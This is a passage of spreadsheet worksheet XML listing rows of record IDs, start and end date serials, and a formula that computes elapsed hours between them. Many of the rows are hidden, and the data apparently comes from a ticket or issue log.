        <v>886</v>
      </c>
      <c r="H716" t="str">
        <f>TEXT(F716-E716,"[h]")</f>
        <v>286</v>
      </c>
    </row>
    <row r="717" spans="1:8" hidden="1">
      <c r="A717" t="s">
        <v>2363</v>
      </c>
      <c r="B717">
        <v>13015</v>
      </c>
      <c r="C717" t="s">
        <v>2364</v>
      </c>
      <c r="D717" t="s">
        <v>7</v>
      </c>
      <c r="E717" s="1">
        <v>43518.449756944443</v>
      </c>
      <c r="F717" s="1">
        <v>43518.63790509259</v>
      </c>
      <c r="G717" t="s">
        <v>304</v>
      </c>
      <c r="H717" t="str">
        <f>TEXT(F717-E717,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="718" spans="1:8" hidden="1">
      <c r="A718" t="s">
        <v>2365</v>
      </c>
      <c r="B718">
        <v>13014</v>
      </c>
      <c r="C718" t="s">
        <v>2366</v>
      </c>
      <c r="D718" t="s">
        <v>7</v>
      </c>
      <c r="E718" s="1">
        <v>43518.422349537039</v>
      </c>
      <c r="F718" s="1">
        <v>43731.230694444443</v>
      </c>
      <c r="G718" t="s">
        <v>2367</v>
      </c>
      <c r="H718" t="str">
        <f>TEXT(F718-E718,"[h]")</f>
        <v>5107</v>
      </c>
    </row>
    <row r="719" spans="1:8" hidden="1">
      <c r="A719" t="s">
        <v>2368</v>
      </c>
      <c r="B719">
        <v>13013</v>
      </c>
      <c r="C719" t="s">
        <v>2369</v>
      </c>
      <c r="D719" t="s">
        <v>7</v>
      </c>
      <c r="E719" s="1">
        <v>43518.368263888886</v>
      </c>
      <c r="F719" s="1">
        <v>43548.252893518518</v>
      </c>
      <c r="G719" t="s">
        <v>115</v>
      </c>
      <c r="H719" t="str">
        <f>TEXT(F719-E719,"[h]")</f>
        <v>717</v>
      </c>
    </row>
    <row r="720" spans="1:8" hidden="1">
      <c r="A720" t="s">
        <v>2370</v>
      </c>
      <c r="B720">
        <v>13012</v>
      </c>
      <c r="C720" t="s">
        <v>2371</v>
      </c>
      <c r="D720" t="s">
        <v>7</v>
      </c>
      <c r="E720" s="1">
        <v>43518.239386574074</v>
      </c>
      <c r="F720" s="1">
        <v>43530.270729166667</v>
      </c>
      <c r="G720" t="s">
        <v>886</v>
      </c>
      <c r="H720" t="str">
        <f>TEXT(F720-E720,"[h]")</f>
        <v>288</v>
      </c>
    </row>
    <row r="721" spans="1:8" hidden="1">
      <c r="A721" t="s">
        <v>2372</v>
      </c>
      <c r="B721">
        <v>13010</v>
      </c>
      <c r="C721" t="s">
        <v>2373</v>
      </c>
      <c r="D721" t="s">
        <v>7</v>
      </c>
      <c r="E721" s="1">
        <v>43518.078831018516</v>
      </c>
      <c r="F721" s="1">
        <v>43518.651203703703</v>
      </c>
      <c r="G721" t="s">
        <v>304</v>
      </c>
      <c r="H721" t="str">
        <f>TEXT(F721-E721,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="722" spans="1:8" hidden="1">
      <c r="A722" t="s">
        <v>2374</v>
      </c>
      <c r="B722">
        <v>13009</v>
      </c>
      <c r="C722" t="s">
        <v>2375</v>
      </c>
      <c r="D722" t="s">
        <v>7</v>
      </c>
      <c r="E722" s="1">
        <v>43517.883043981485</v>
      </c>
      <c r="F722" s="1">
        <v>43530.313078703701</v>
      </c>
      <c r="G722" t="s">
        <v>886</v>
      </c>
      <c r="H722" t="str">
        <f>TEXT(F722-E722,"[h]")</f>
        <v>298</v>
      </c>
    </row>
    <row r="723" spans="1:8" hidden="1">
      <c r="A723" t="s">
        <v>2376</v>
      </c>
      <c r="B723">
        <v>13008</v>
      </c>
      <c r="C723" t="s">
        <v>2377</v>
      </c>
      <c r="D723" t="s">
        <v>7</v>
      </c>
      <c r="E723" s="1">
        <v>43517.829791666663</v>
      </c>
      <c r="F723" s="1">
        <v>43518.082812499997</v>
      </c>
      <c r="G723" t="s">
        <v>28</v>
      </c>
      <c r="H723" t="str">
        <f>TEXT(F723-E723,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="724" spans="1:8" hidden="1">
      <c r="A724" t="s">
        <v>2378</v>
      </c>
      <c r="B724">
        <v>13006</v>
      </c>
      <c r="C724" t="s">
        <v>2379</v>
      </c>
      <c r="D724" t="s">
        <v>7</v>
      </c>
      <c r="E724" s="1">
        <v>43517.466631944444</v>
      </c>
      <c r="F724" s="1">
        <v>43521.193703703706</v>
      </c>
      <c r="G724" t="s">
        <v>2380</v>
      </c>
      <c r="H724" t="str">
        <f>TEXT(F724-E724,"[h]")</f>
        <v>89</v>
      </c>
    </row>
    <row r="725" spans="1:8" hidden="1">
      <c r="A725" t="s">
        <v>2381</v>
      </c>
      <c r="B725">
        <v>13005</v>
      </c>
      <c r="C725" t="s">
        <v>2382</v>
      </c>
      <c r="D725" t="s">
        <v>7</v>
      </c>
      <c r="E725" s="1">
        <v>43517.383067129631</v>
      </c>
      <c r="F725" s="1">
        <v>43605.572500000002</v>
      </c>
      <c r="G725" t="s">
        <v>174</v>
      </c>
      <c r="H725" t="str">
        <f>TEXT(F725-E725,"[h]")</f>
        <v>2116</v>
      </c>
    </row>
    <row r="726" spans="1:8" hidden="1">
      <c r="A726" t="s">
        <v>2383</v>
      </c>
      <c r="B726">
        <v>13004</v>
      </c>
      <c r="C726" t="s">
        <v>2384</v>
      </c>
      <c r="D726" t="s">
        <v>7</v>
      </c>
      <c r="E726" s="1">
        <v>43517.071851851855</v>
      </c>
      <c r="F726" s="1">
        <v>43517.275613425925</v>
      </c>
      <c r="G726" t="s">
        <v>174</v>
      </c>
      <c r="H726" t="str">
        <f>TEXT(F726-E726,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="727" spans="1:8">
      <c r="A727" t="s">
        <v>2385</v>
      </c>
      <c r="B727">
        <v>13003</v>
      </c>
      <c r="C727" t="s">
        <v>1630</v>
      </c>
      <c r="D727" t="s">
        <v>7</v>
      </c>
      <c r="E727" s="1">
        <v>43516.953472222223</v>
      </c>
      <c r="F727" s="1">
        <v>43649.691192129627</v>
      </c>
      <c r="G727" t="s">
        <v>1579</v>
      </c>
      <c r="H727" t="str">
        <f>TEXT(F727-E727,"[h]")</f>
        <v>3185</v>
      </c>
    </row>
    <row r="728" spans="1:8" hidden="1">
      <c r="A728" t="s">
        <v>2386</v>
      </c>
      <c r="B728">
        <v>13002</v>
      </c>
      <c r="C728" t="s">
        <v>2387</v>
      </c>
      <c r="D728" t="s">
        <v>7</v>
      </c>
      <c r="E728" s="1">
        <v>43516.91196759259</v>
      </c>
      <c r="F728" s="1">
        <v>43524.850162037037</v>
      </c>
      <c r="G728" t="s">
        <v>66</v>
      </c>
      <c r="H728" t="str">
        <f>TEXT(F728-E728,"[h]")</f>
        <v>190</v>
      </c>
    </row>
    <row r="729" spans="1:8" hidden="1">
      <c r="A729" t="s">
        <v>2388</v>
      </c>
      <c r="B729">
        <v>12999</v>
      </c>
      <c r="C729" t="s">
        <v>2389</v>
      </c>
      <c r="D729" t="s">
        <v>7</v>
      </c>
      <c r="E729" s="1">
        <v>43516.527685185189</v>
      </c>
      <c r="F729" s="1">
        <v>43581.016527777778</v>
      </c>
      <c r="G729" t="s">
        <v>2390</v>
      </c>
      <c r="H729" t="str">
        <f>TEXT(F729-E729,"[h]")</f>
        <v>1547</v>
      </c>
    </row>
    <row r="730" spans="1:8" hidden="1">
      <c r="A730" t="s">
        <v>2391</v>
      </c>
      <c r="B730">
        <v>12996</v>
      </c>
      <c r="C730" t="s">
        <v>2392</v>
      </c>
      <c r="D730" t="s">
        <v>7</v>
      </c>
      <c r="E730" s="1">
        <v>43516.296689814815</v>
      </c>
      <c r="F730" s="1">
        <v>43516.33148148148</v>
      </c>
      <c r="G730" t="s">
        <v>43</v>
      </c>
      <c r="H730" t="str">
        <f>TEXT(F730-E730,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="731" spans="1:8">
      <c r="A731" t="s">
        <v>2393</v>
      </c>
      <c r="B731">
        <v>12995</v>
      </c>
      <c r="C731" t="s">
        <v>2394</v>
      </c>
      <c r="D731" t="s">
        <v>7</v>
      </c>
      <c r="E731" s="1">
        <v>43516.290798611109</v>
      </c>
      <c r="F731" s="1">
        <v>43516.328402777777</v>
      </c>
      <c r="G731" t="s">
        <v>25</v>
      </c>
      <c r="H731" t="str">
        <f>TEXT(F731-E731,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="732" spans="1:8" hidden="1">
      <c r="A732" t="s">
        <v>2395</v>
      </c>
      <c r="B732">
        <v>12992</v>
      </c>
      <c r="C732" t="s">
        <v>2396</v>
      </c>
      <c r="D732" t="s">
        <v>7</v>
      </c>
      <c r="E732" s="1">
        <v>43515.739317129628</v>
      </c>
      <c r="F732" s="1">
        <v>43518.670034722221</v>
      </c>
      <c r="G732" t="s">
        <v>304</v>
      </c>
      <c r="H732" t="str">
        <f>TEXT(F732-E732,"[h]")</f>
        <v>70</v>
      </c>
    </row>
    <row r="733" spans="1:8">
      <c r="A733" t="s">
        <v>2397</v>
      </c>
      <c r="B733">
        <v>12991</v>
      </c>
      <c r="C733" t="s">
        <v>2398</v>
      </c>
      <c r="D733" t="s">
        <v>7</v>
      </c>
      <c r="E733" s="1">
        <v>43515.59883101852</v>
      </c>
      <c r="F733" s="1">
        <v>43663.60659722222</v>
      </c>
      <c r="G733" t="s">
        <v>13</v>
      </c>
      <c r="H733" t="str">
        <f>TEXT(F733-E733,"[h]")</f>
        <v>3552</v>
      </c>
    </row>
    <row r="734" spans="1:8" hidden="1">
      <c r="A734" t="s">
        <v>2399</v>
      </c>
      <c r="B734">
        <v>12989</v>
      </c>
      <c r="C734" t="s">
        <v>2400</v>
      </c>
      <c r="D734" t="s">
        <v>7</v>
      </c>
      <c r="E734" s="1">
        <v>43515.311249999999</v>
      </c>
      <c r="F734" s="1">
        <v>43521.709583333337</v>
      </c>
      <c r="G734" t="s">
        <v>258</v>
      </c>
      <c r="H734" t="str">
        <f>TEXT(F734-E734,"[h]")</f>
        <v>153</v>
      </c>
    </row>
    <row r="735" spans="1:8" hidden="1">
      <c r="A735" t="s">
        <v>2401</v>
      </c>
      <c r="B735">
        <v>12988</v>
      </c>
      <c r="C735" t="s">
        <v>2402</v>
      </c>
      <c r="D735" t="s">
        <v>7</v>
      </c>
      <c r="E735" s="1">
        <v>43515.157754629632</v>
      </c>
      <c r="F735" s="1">
        <v>43553.091736111113</v>
      </c>
      <c r="G735" t="s">
        <v>37</v>
      </c>
      <c r="H735" t="str">
        <f>TEXT(F735-E735,"[h]")</f>
        <v>910</v>
      </c>
    </row>
    <row r="736" spans="1:8" hidden="1">
      <c r="A736" t="s">
        <v>2403</v>
      </c>
      <c r="B736">
        <v>12987</v>
      </c>
      <c r="C736" t="s">
        <v>2404</v>
      </c>
      <c r="D736" t="s">
        <v>7</v>
      </c>
      <c r="E736" s="1">
        <v>43514.861921296295</v>
      </c>
      <c r="F736" s="1">
        <v>43531.283819444441</v>
      </c>
      <c r="G736" t="s">
        <v>118</v>
      </c>
      <c r="H736" t="str">
        <f>TEXT(F736-E736,"[h]")</f>
        <v>394</v>
      </c>
    </row>
    <row r="737" spans="1:8">
      <c r="A737" t="s">
        <v>2405</v>
      </c>
      <c r="B737">
        <v>12979</v>
      </c>
      <c r="C737" t="s">
        <v>2406</v>
      </c>
      <c r="D737" t="s">
        <v>7</v>
      </c>
      <c r="E737" s="1">
        <v>43513.191145833334</v>
      </c>
      <c r="F737" s="1">
        <v>43520.91070601852</v>
      </c>
      <c r="G737" t="s">
        <v>2407</v>
      </c>
      <c r="H737" t="str">
        <f>TEXT(F737-E737,"[h]")</f>
        <v>185</v>
      </c>
    </row>
    <row r="738" spans="1:8">
      <c r="A738" t="s">
        <v>2408</v>
      </c>
      <c r="B738">
        <v>12978</v>
      </c>
      <c r="C738" t="s">
        <v>2409</v>
      </c>
      <c r="D738" t="s">
        <v>7</v>
      </c>
      <c r="E738" s="1">
        <v>43513.150289351855</v>
      </c>
      <c r="F738" s="1">
        <v>43516.700277777774</v>
      </c>
      <c r="G738" t="s">
        <v>31</v>
      </c>
      <c r="H738" t="str">
        <f>TEXT(F738-E738,"[h]")</f>
        <v>85</v>
      </c>
    </row>
    <row r="739" spans="1:8" hidden="1">
      <c r="A739" t="s">
        <v>2410</v>
      </c>
      <c r="B739">
        <v>12977</v>
      </c>
      <c r="C739" t="s">
        <v>1927</v>
      </c>
      <c r="D739" t="s">
        <v>7</v>
      </c>
      <c r="E739" s="1">
        <v>43512.496759259258</v>
      </c>
      <c r="F739" s="1">
        <v>43539.256215277775</v>
      </c>
      <c r="G739" t="s">
        <v>886</v>
      </c>
      <c r="H739" t="str">
        <f>TEXT(F739-E739,"[h]")</f>
        <v>642</v>
      </c>
    </row>
    <row r="740" spans="1:8" hidden="1">
      <c r="A740" t="s">
        <v>2411</v>
      </c>
      <c r="B740">
        <v>12975</v>
      </c>
      <c r="C740" t="s">
        <v>2412</v>
      </c>
      <c r="D740" t="s">
        <v>7</v>
      </c>
      <c r="E740" s="1">
        <v>43511.83488425926</v>
      </c>
      <c r="F740" s="1">
        <v>43518.661886574075</v>
      </c>
      <c r="G740" t="s">
        <v>138</v>
      </c>
      <c r="H740" t="str">
        <f>TEXT(F740-E740,"[h]")</f>
        <v>163</v>
      </c>
    </row>
    <row r="741" spans="1:8" hidden="1">
      <c r="A741" t="s">
        <v>2413</v>
      </c>
      <c r="B741">
        <v>12973</v>
      </c>
      <c r="C741" t="s">
        <v>2414</v>
      </c>
      <c r="D741" t="s">
        <v>7</v>
      </c>
      <c r="E741" s="1">
        <v>43511.562604166669</v>
      </c>
      <c r="F741" s="1">
        <v>43518.791863425926</v>
      </c>
      <c r="G741" t="s">
        <v>255</v>
      </c>
      <c r="H741" t="str">
        <f>TEXT(F741-E741,"[h]")</f>
        <v>173</v>
      </c>
    </row>
    <row r="742" spans="1:8" hidden="1">
      <c r="A742" t="s">
        <v>2415</v>
      </c>
      <c r="B742">
        <v>12972</v>
      </c>
      <c r="C742" t="s">
        <v>2416</v>
      </c>
      <c r="D742" t="s">
        <v>7</v>
      </c>
      <c r="E742" s="1">
        <v>43511.073645833334</v>
      </c>
      <c r="F742" s="1">
        <v>43518.666342592594</v>
      </c>
      <c r="G742" t="s">
        <v>886</v>
      </c>
      <c r="H742" t="str">
        <f>TEXT(F742-E742,"[h]")</f>
        <v>182</v>
      </c>
    </row>
    <row r="743" spans="1:8" hidden="1">
      <c r="A743" t="s">
        <v>2417</v>
      </c>
      <c r="B743">
        <v>12971</v>
      </c>
      <c r="C743" t="s">
        <v>2418</v>
      </c>
      <c r="D743" t="s">
        <v>7</v>
      </c>
      <c r="E743" s="1">
        <v>43510.98542824074</v>
      </c>
      <c r="F743" s="1">
        <v>43617.823148148149</v>
      </c>
      <c r="G743" t="s">
        <v>37</v>
      </c>
      <c r="H743" t="str">
        <f>TEXT(F743-E743,"[h]")</f>
        <v>2564</v>
      </c>
    </row>
    <row r="744" spans="1:8" hidden="1">
      <c r="A744" t="s">
        <v>2419</v>
      </c>
      <c r="B744">
        <v>12970</v>
      </c>
      <c r="C744" t="s">
        <v>2420</v>
      </c>
      <c r="D744" t="s">
        <v>7</v>
      </c>
      <c r="E744" s="1">
        <v>43510.939699074072</v>
      </c>
      <c r="F744" s="1">
        <v>43518.659861111111</v>
      </c>
      <c r="G744" t="s">
        <v>886</v>
      </c>
      <c r="H744" t="str">
        <f>TEXT(F744-E744,"[h]")</f>
        <v>185</v>
      </c>
    </row>
    <row r="745" spans="1:8" hidden="1">
      <c r="A745" t="s">
        <v>2421</v>
      </c>
      <c r="B745">
        <v>12968</v>
      </c>
      <c r="C745" t="s">
        <v>2422</v>
      </c>
      <c r="D745" t="s">
        <v>7</v>
      </c>
      <c r="E745" s="1">
        <v>43510.332986111112</v>
      </c>
      <c r="F745" s="1">
        <v>43523.889062499999</v>
      </c>
      <c r="G745" t="s">
        <v>2423</v>
      </c>
      <c r="H745" t="str">
        <f>TEXT(F745-E745,"[h]")</f>
        <v>325</v>
      </c>
    </row>
    <row r="746" spans="1:8" hidden="1">
      <c r="A746" t="s">
        <v>2424</v>
      </c>
      <c r="B746">
        <v>12965</v>
      </c>
      <c r="C746" t="s">
        <v>2425</v>
      </c>
      <c r="D746" t="s">
        <v>7</v>
      </c>
      <c r="E746" s="1">
        <v>43509.915717592594</v>
      </c>
      <c r="F746" s="1">
        <v>43513.336238425924</v>
      </c>
      <c r="G746" t="s">
        <v>66</v>
      </c>
      <c r="H746" t="str">
        <f>TEXT(F746-E746,"[h]")</f>
        <v>82</v>
      </c>
    </row>
    <row r="747" spans="1:8" hidden="1">
      <c r="A747" t="s">
        <v>2426</v>
      </c>
      <c r="B747">
        <v>12964</v>
      </c>
      <c r="C747" t="s">
        <v>2427</v>
      </c>
      <c r="D747" t="s">
        <v>7</v>
      </c>
      <c r="E747" s="1">
        <v>43509.761712962965</v>
      </c>
      <c r="F747" s="1">
        <v>43515.731747685182</v>
      </c>
      <c r="G747" t="s">
        <v>204</v>
      </c>
      <c r="H747" t="str">
        <f>TEXT(F747-E747,"[h]")</f>
        <v>143</v>
      </c>
    </row>
    <row r="748" spans="1:8" hidden="1">
      <c r="A748" t="s">
        <v>1772</v>
      </c>
      <c r="B748">
        <v>12963</v>
      </c>
      <c r="C748" t="s">
        <v>2428</v>
      </c>
      <c r="D748" t="s">
        <v>7</v>
      </c>
      <c r="E748" s="1">
        <v>43509.748680555553</v>
      </c>
      <c r="F748" s="1">
        <v>43515.437881944446</v>
      </c>
      <c r="G748" t="s">
        <v>66</v>
      </c>
      <c r="H748" t="str">
        <f>TEXT(F748-E748,"[h]")</f>
        <v>136</v>
      </c>
    </row>
    <row r="749" spans="1:8" hidden="1">
      <c r="A749" t="s">
        <v>2429</v>
      </c>
      <c r="B749">
        <v>12962</v>
      </c>
      <c r="C749" t="s">
        <v>2430</v>
      </c>
      <c r="D749" t="s">
        <v>7</v>
      </c>
      <c r="E749" s="1">
        <v>43509.731122685182</v>
      </c>
      <c r="F749" s="1">
        <v>43597.160497685189</v>
      </c>
      <c r="G749" t="s">
        <v>37</v>
      </c>
      <c r="H749" t="str">
        <f>TEXT(F749-E749,"[h]")</f>
        <v>2098</v>
      </c>
    </row>
    <row r="750" spans="1:8">
      <c r="A750" t="s">
        <v>2431</v>
      </c>
      <c r="B750">
        <v>12957</v>
      </c>
      <c r="C750" t="s">
        <v>2432</v>
      </c>
      <c r="D750" t="s">
        <v>7</v>
      </c>
      <c r="E750" s="1">
        <v>43508.09516203704</v>
      </c>
      <c r="F750" s="1">
        <v>43530.312708333331</v>
      </c>
      <c r="G750" t="s">
        <v>69</v>
      </c>
      <c r="H750" t="str">
        <f>TEXT(F750-E750,"[h]")</f>
        <v>533</v>
      </c>
    </row>
    <row r="751" spans="1:8" hidden="1">
      <c r="A751" t="s">
        <v>2433</v>
      </c>
      <c r="B751">
        <v>12954</v>
      </c>
      <c r="C751" t="s">
        <v>2434</v>
      </c>
      <c r="D751" t="s">
        <v>7</v>
      </c>
      <c r="E751" s="1">
        <v>43507.798090277778</v>
      </c>
      <c r="F751" s="1">
        <v>43507.805879629632</v>
      </c>
      <c r="G751" t="s">
        <v>2435</v>
      </c>
      <c r="H751" t="str">
        <f>TEXT(F751-E751,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="752" spans="1:8" hidden="1">
      <c r="A752" t="s">
        <v>2436</v>
      </c>
      <c r="B752">
        <v>12953</v>
      </c>
      <c r="C752" t="s">
        <v>2437</v>
      </c>
      <c r="D752" t="s">
        <v>7</v>
      </c>
      <c r="E752" s="1">
        <v>43507.796365740738</v>
      </c>
      <c r="F752" s="1">
        <v>43628.090856481482</v>
      </c>
      <c r="G752" t="s">
        <v>118</v>
      </c>
      <c r="H752" t="str">
        <f>TEXT(F752-E752,"[h]")</f>
        <v>2887</v>
      </c>
    </row>
    <row r="753" spans="1:8" hidden="1">
      <c r="A753" t="s">
        <v>2438</v>
      </c>
      <c r="B753">
        <v>12952</v>
      </c>
      <c r="C753" t="s">
        <v>2439</v>
      </c>
      <c r="D753" t="s">
        <v>7</v>
      </c>
      <c r="E753" s="1">
        <v>43507.436331018522</v>
      </c>
      <c r="F753" s="1">
        <v>43507.744606481479</v>
      </c>
      <c r="G753" t="s">
        <v>2440</v>
      </c>
      <c r="H753" t="str">
        <f>TEXT(F753-E753,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="754" spans="1:8">
      <c r="A754" t="s">
        <v>2441</v>
      </c>
      <c r="B754">
        <v>12951</v>
      </c>
      <c r="C754" t="s">
        <v>2442</v>
      </c>
      <c r="D754" t="s">
        <v>7</v>
      </c>
      <c r="E754" s="1">
        <v>43506.679143518515</v>
      </c>
      <c r="F754" s="1">
        <v>43521.709583333337</v>
      </c>
      <c r="G754" t="s">
        <v>31</v>
      </c>
      <c r="H754" t="str">
        <f>TEXT(F754-E754,"[h]")</f>
        <v>360</v>
      </c>
    </row>
    <row r="755" spans="1:8" hidden="1">
      <c r="A755" t="s">
        <v>2443</v>
      </c>
      <c r="B755">
        <v>12949</v>
      </c>
      <c r="C755" t="s">
        <v>2444</v>
      </c>
      <c r="D755" t="s">
        <v>7</v>
      </c>
      <c r="E755" s="1">
        <v>43504.977083333331</v>
      </c>
      <c r="F755" s="1">
        <v>43506.721168981479</v>
      </c>
      <c r="G755" t="s">
        <v>157</v>
      </c>
      <c r="H755" t="str">
        <f>TEXT(F755-E755,"[h]")</f>
        <v>41</v>
      </c>
    </row>
    <row r="756" spans="1:8" hidden="1">
      <c r="A756" t="s">
        <v>2445</v>
      </c>
      <c r="B756">
        <v>12948</v>
      </c>
      <c r="C756" t="s">
        <v>2446</v>
      </c>
      <c r="D756" t="s">
        <v>7</v>
      </c>
      <c r="E756" s="1">
        <v>43504.747037037036</v>
      </c>
      <c r="F756" s="1">
        <v>43510.835335648146</v>
      </c>
      <c r="G756" t="s">
        <v>118</v>
      </c>
      <c r="H756" t="str">
        <f>TEXT(F756-E756,"[h]")</f>
        <v>146</v>
      </c>
    </row>
    <row r="757" spans="1:8">
      <c r="A757" t="s">
        <v>2447</v>
      </c>
      <c r="B757">
        <v>12945</v>
      </c>
      <c r="C757" t="s">
        <v>2448</v>
      </c>
      <c r="D757" t="s">
        <v>7</v>
      </c>
      <c r="E757" s="1">
        <v>43503.913900462961</v>
      </c>
      <c r="F757" s="1">
        <v>43509.931354166663</v>
      </c>
      <c r="G757" t="s">
        <v>16</v>
      </c>
      <c r="H757" t="str">
        <f>TEXT(F757-E757,"[h]")</f>
        <v>144</v>
      </c>
    </row>
    <row r="758" spans="1:8">
      <c r="A758" t="s">
        <v>2449</v>
      </c>
      <c r="B758">
        <v>12944</v>
      </c>
      <c r="C758" t="s">
        <v>2450</v>
      </c>
      <c r="D758" t="s">
        <v>7</v>
      </c>
      <c r="E758" s="1">
        <v>43503.719513888886</v>
      </c>
      <c r="F758" s="1">
        <v>43503.773969907408</v>
      </c>
      <c r="G758" t="s">
        <v>16</v>
      </c>
      <c r="H758" t="str">
        <f>TEXT(F758-E758,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="759" spans="1:8" hidden="1">
      <c r="A759" t="s">
        <v>2451</v>
      </c>
      <c r="B759">
        <v>12942</v>
      </c>
      <c r="C759" t="s">
        <v>2452</v>
      </c>
      <c r="D759" t="s">
        <v>7</v>
      </c>
      <c r="E759" s="1">
        <v>43503.392604166664</v>
      </c>
      <c r="F759" s="1">
        <v>43612.777233796296</v>
      </c>
      <c r="G759" t="s">
        <v>109</v>
      </c>
      <c r="H759" t="str">
        <f>TEXT(F759-E759,"[h]")</f>
        <v>2625</v>
      </c>
    </row>
    <row r="760" spans="1:8">
      <c r="A760" t="s">
        <v>2453</v>
      </c>
      <c r="B760">
        <v>12941</v>
      </c>
      <c r="C760" t="s">
        <v>2454</v>
      </c>
      <c r="D760" t="s">
        <v>7</v>
      </c>
      <c r="E760" s="1">
        <v>43502.780636574076</v>
      </c>
      <c r="F760" s="1">
        <v>43753.774351851855</v>
      </c>
      <c r="G760" t="s">
        <v>25</v>
      </c>
      <c r="H760" t="str">
        <f>TEXT(F760-E760,"[h]")</f>
        <v>6023</v>
      </c>
    </row>
    <row r="761" spans="1:8" hidden="1">
      <c r="A761" t="s">
        <v>2455</v>
      </c>
      <c r="B761">
        <v>12940</v>
      </c>
      <c r="C761" t="s">
        <v>2456</v>
      </c>
      <c r="D761" t="s">
        <v>7</v>
      </c>
      <c r="E761" s="1">
        <v>43502.026944444442</v>
      </c>
      <c r="F761" s="1">
        <v>43539.948611111111</v>
      </c>
      <c r="G761" t="s">
        <v>2457</v>
      </c>
      <c r="H761" t="str">
        <f>TEXT(F761-E761,"[h]")</f>
        <v>910</v>
      </c>
    </row>
    <row r="762" spans="1:8" hidden="1">
      <c r="A762" t="s">
        <v>2458</v>
      </c>
      <c r="B762">
        <v>12939</v>
      </c>
      <c r="C762" t="s">
        <v>2459</v>
      </c>
      <c r="D762" t="s">
        <v>7</v>
      </c>
      <c r="E762" s="1">
        <v>43501.905069444445</v>
      </c>
      <c r="F762" s="1">
        <v>43753.814895833333</v>
      </c>
      <c r="G762" t="s">
        <v>1095</v>
      </c>
      <c r="H762" t="str">
        <f>TEXT(F762-E762,"[h]")</f>
        <v>6045</v>
      </c>
    </row>
    <row r="763" spans="1:8" hidden="1">
      <c r="A763" t="s">
        <v>2460</v>
      </c>
      <c r="B763">
        <v>12937</v>
      </c>
      <c r="C763" t="s">
        <v>2461</v>
      </c>
      <c r="D763" t="s">
        <v>7</v>
      </c>
      <c r="E763" s="1">
        <v>43501.787615740737</v>
      </c>
      <c r="F763" s="1">
        <v>43503.390416666669</v>
      </c>
      <c r="G763" t="s">
        <v>204</v>
      </c>
      <c r="H763" t="str">
        <f>TEXT(F763-E763,"[h]")</f>
        <v>38</v>
      </c>
    </row>
    <row r="764" spans="1:8">
      <c r="A764" t="s">
        <v>2462</v>
      </c>
      <c r="B764">
        <v>12934</v>
      </c>
      <c r="C764" t="s">
        <v>2463</v>
      </c>
      <c r="D764" t="s">
        <v>7</v>
      </c>
      <c r="E764" s="1">
        <v>43501.46166666667</v>
      </c>
      <c r="F764" s="1">
        <v>43581.459270833337</v>
      </c>
      <c r="G764" t="s">
        <v>25</v>
      </c>
      <c r="H764" t="str">
        <f>TEXT(F764-E764,"[h]")</f>
        <v>1919</v>
      </c>
    </row>
    <row r="765" spans="1:8">
      <c r="A765" t="s">
        <v>2464</v>
      </c>
      <c r="B765">
        <v>12932</v>
      </c>
      <c r="C765" t="s">
        <v>2465</v>
      </c>
      <c r="D765" t="s">
        <v>7</v>
      </c>
      <c r="E765" s="1">
        <v>43501.36310185185</v>
      </c>
      <c r="F765" s="1">
        <v>43510.852997685186</v>
      </c>
      <c r="G765" t="s">
        <v>16</v>
      </c>
      <c r="H765" t="str">
        <f>TEXT(F765-E765,"[h]")</f>
        <v>227</v>
      </c>
    </row>
    <row r="766" spans="1:8" hidden="1">
      <c r="A766" t="s">
        <v>2466</v>
      </c>
      <c r="B766">
        <v>12931</v>
      </c>
      <c r="C766" t="s">
        <v>2467</v>
      </c>
      <c r="D766" t="s">
        <v>7</v>
      </c>
      <c r="E766" s="1">
        <v>43501.333599537036</v>
      </c>
      <c r="F766" s="1">
        <v>43534.420266203706</v>
      </c>
      <c r="G766" t="s">
        <v>28</v>
      </c>
      <c r="H766" t="str">
        <f>TEXT(F766-E766,"[h]")</f>
        <v>794</v>
      </c>
    </row>
    <row r="767" spans="1:8" hidden="1">
      <c r="A767" t="s">
        <v>2468</v>
      </c>
      <c r="B767">
        <v>12929</v>
      </c>
      <c r="C767" t="s">
        <v>2469</v>
      </c>
      <c r="D767" t="s">
        <v>7</v>
      </c>
      <c r="E767" s="1">
        <v>43500.476921296293</v>
      </c>
      <c r="F767" s="1">
        <v>43503.396956018521</v>
      </c>
      <c r="G767" t="s">
        <v>255</v>
      </c>
      <c r="H767" t="str">
        <f>TEXT(F767-E767,"[h]")</f>
        <v>70</v>
      </c>
    </row>
    <row r="768" spans="1:8" hidden="1">
      <c r="A768" t="s">
        <v>2470</v>
      </c>
      <c r="B768">
        <v>12928</v>
      </c>
      <c r="C768" t="s">
        <v>2471</v>
      </c>
      <c r="D768" t="s">
        <v>7</v>
      </c>
      <c r="E768" s="1">
        <v>43500.347094907411</v>
      </c>
      <c r="F768" s="1">
        <v>43507.71806712963</v>
      </c>
      <c r="G768" t="s">
        <v>883</v>
      </c>
      <c r="H768" t="str">
        <f>TEXT(F768-E768,"[h]")</f>
        <v>176</v>
      </c>
    </row>
    <row r="769" spans="1:8">
      <c r="A769" t="s">
        <v>2331</v>
      </c>
      <c r="B769">
        <v>12925</v>
      </c>
      <c r="C769" t="s">
        <v>2332</v>
      </c>
      <c r="D769" t="s">
        <v>7</v>
      </c>
      <c r="E769" s="1">
        <v>43500.170798611114</v>
      </c>
      <c r="F769" s="1">
        <v>43521.56585648148</v>
      </c>
      <c r="G769" t="s">
        <v>2264</v>
      </c>
      <c r="H769" t="str">
        <f>TEXT(F769-E769,"[h]")</f>
        <v>513</v>
      </c>
    </row>
    <row r="770" spans="1:8" hidden="1">
      <c r="A770" t="s">
        <v>2472</v>
      </c>
      <c r="B770">
        <v>12920</v>
      </c>
      <c r="C770" t="s">
        <v>2473</v>
      </c>
      <c r="D770" t="s">
        <v>7</v>
      </c>
      <c r="E770" s="1">
        <v>43498.727650462963</v>
      </c>
      <c r="F770" s="1">
        <v>43498.769976851851</v>
      </c>
      <c r="G770" t="s">
        <v>28</v>
      </c>
      <c r="H770" t="str">
        <f>TEXT(F770-E770,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="771" spans="1:8">
